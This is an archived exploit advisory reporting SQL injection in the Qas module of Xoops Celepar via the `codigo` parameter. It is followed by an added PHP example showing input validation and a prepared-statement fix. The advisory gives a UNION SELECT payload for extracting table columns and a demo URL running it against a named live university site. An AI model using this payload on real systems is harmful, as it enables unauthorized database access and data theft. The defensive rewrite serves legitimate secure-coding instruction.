- Code:
**********************************************************************************************************
Xoops Celepar Module Qas
Download of Xoops Celepar: http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz
Author: s4r4d0
mail:s4r4d0@yahoo.com
**********************************************************************************************************
An SQL injection has been found in the Qas module of Xoops Celepar, in the file Aviso.php.
Source code:
}
$codigo = $_POST['codigo'];
} else
$codigo = $_GET['codigo'];
***********************************************************************************************************
Target: site.com.br/modules/qas/aviso.php?codigo=
Sql Code :-1+UNION+SELECT+1,2,columnname,4,5,6,7,8+from+tablename
Demo: http://www.dce.uem.br/modules/qas/aviso.php?codigo=-1+UNION+SELECT+1,2,3,4,5,6,7,8--
***********************************************************************************************************
[ Fatal Error Group Br ]
[Greetz: to Elemento_pcx - m4v3rick - w4nt3d - DD3str0yer - M0nt3r - Vympel]
[From Brazil]
************************************************************************************************************
# milw0rm.com [2009-07-24]
Xoops Celepar Module Qas (codigo) SQL Injection Vulnerability
Foxi- Admin
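A hardened form of the `codigo` handling quoted in the advisory, as an added example that is not the module's own code. The table `qas_aviso`, its columns, the function names and the in-memory SQLite data are assumptions made for illustration; the page does not show the module's query.

```php
<?php
declare(strict_types=1);

// Same POST-then-GET lookup of `codigo` as the quoted source, but only a
// positive decimal integer is accepted. Anything else yields null.
function read_codigo(array $post, array $get): ?int
{
    $raw = $post['codigo'] ?? $get['codigo'] ?? null;
    if (!is_string($raw)) {
        return null; // missing, or an array parameter such as codigo[]=1
    }
    $value = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $value === false ? null : $value;
}

// Bound parameter: the value is never concatenated into the SQL text.
// Table and column names are hypothetical.
function fetch_aviso(PDO $db, int $codigo): ?array
{
    $stmt = $db->prepare('SELECT codigo, titulo FROM qas_aviso WHERE codigo = :codigo');
    $stmt->bindValue(':codigo', $codigo, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE qas_aviso (codigo INTEGER PRIMARY KEY, titulo TEXT)');
$db->exec("INSERT INTO qas_aviso VALUES (1, 'Aviso de teste')");

// Constructed request parameters, as PHP would present them in $_GET.
$requests = [
    ['codigo' => '1'],
    ['codigo' => '-1 UNION SELECT 1,2,3,4,5,6,7,8--'], // the advisory's demo value, URL-decoded
    ['codigo' => ['1']],
    [],
];
foreach ($requests as $get) {
    $codigo = read_codigo([], $get);
    if ($codigo === null) {
        echo 'rejected: ', json_encode($get), "\n";
        continue;
    }
    echo "codigo=$codigo -> ", json_encode(fetch_aviso($db, $codigo)), "\n";
}
```

Validation and parameter binding are independent controls here: the integer check rejects malformed input early, and the prepared statement keeps the query safe even if a later change loosens that check.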